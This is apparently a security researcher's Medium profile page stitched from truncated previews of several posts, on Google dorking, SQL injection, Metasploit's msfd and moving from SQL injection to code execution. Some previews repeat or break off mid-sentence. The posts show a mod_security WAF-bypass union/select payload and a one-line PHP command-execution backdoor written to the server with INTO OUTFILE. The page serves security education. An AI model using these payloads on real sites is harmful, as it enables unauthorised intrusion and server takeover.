
My name is Luis Madero (_Y000!_). I am a computer systems engineer, bug hunter and, above all, a lover of web security. In this write-up I would like to cover the topic of XSS injections from a theoretical point of view through to some examples of injections throughout history.


What is dorking?

Google hacking, or dorking, is simply a more specialized way of searching for things. The name “Google Hacking” can give the impression that it only applies to Google, but that is not correct. Dorking is an advanced search in which we use operators that act as filters to point the search exactly where we want it, and symbols to search for exact words or phrases. This works in almost any search engine we find on the internet.

Importance

Knowing a little about “Dorking” helps us…


sql injection | LaptrinhX

In this write-up I will leave some tips for SQL injections, where I will try to explain only specific points.

First we will talk about how to find a vulnerable page thanks to Google hacking.

Dorks




In this write-up I would like to show you a somewhat peculiar case that I came across while testing a website.

This is an SQL injection where I was able to bypass the “mod_security” WAF.
When I started the SQL injection test I realized that the website was using that WAF.

We get the error when using a simple:

site/ejemplo?parameter=-1+union+selec+1,2,3,4,5,6,7+--+

Now, I’m not going to lie to you: just by encoding the payload with comments, I was able to bypass the WAF filter.

site/ejemplo?parameter=-1+/*!50000union*/+/*!50000selec*/+1,2,3,4,5,6,7+--+




msfd — Provides an instance of msfconsole that remote clients can connect to

root@kali:~# msfd -h

Usage: msfd <options>

OPTIONS:

-A <opt> Specify list of hosts allowed to connect
-D <opt> Specify list of hosts not allowed to connect
-a <opt> Bind to this IP address instead of loopback
-f Run the daemon in the foreground
-h Help banner
-p <opt> Bind to this port instead of 55554
-q Do not print the banner on startup
-s Use SSL

https://tools.kali.org/exploitation-tools/metasploit-framework

Msfd allows us to connect to a Metasploit session no matter what machine we are on, just by having the…


To begin with, we first have to talk about the “Msfd” service.

Msfd allows us to connect to a Metasploit session regardless of…


In this case we are going to take advantage of an SQL injection error to be able to “jump” to other vulnerabilities.

For this we need write permissions and we need to know the path where the server is mounted; you can get it with @@datadir. In this case I have the path on the error screen.

After obtaining the path, what we are going to do is inject the shell; in this case it is a simple backdoor in PHP:

'<?php system($_GET["cmd"]); ?>'

We are going to inject it using:

INTO + OUTFILE…


In this case we are going to take advantage of an SQL injection error to be able to “jump” to other vulnerabilities.

After obtaining the path, what we are going to do is inject the shell; in this case it is a simple backdoor in PHP:

'<?php system($_GET["cmd"]); ?>'

We are going to inject it using:

INTO+OUTFILE+'ruta/nombre.php'

Inject it and the file will be uploaded to the server; now we access it.

_Y000_

Hello, welcome to my Medium profile! I’m Y000! 😊 Who am I? 🤔 Well… I’m me, haha. I’m just someone passionate about information security.
